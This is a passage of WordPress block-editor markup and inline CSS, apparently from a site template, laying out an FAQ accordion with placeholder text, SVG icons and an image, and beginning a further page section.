35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ac4f996e-c6b4-4837-bf52-6ec14496e971\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2ca58aed\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2ca58aed skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2ca58aed {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n 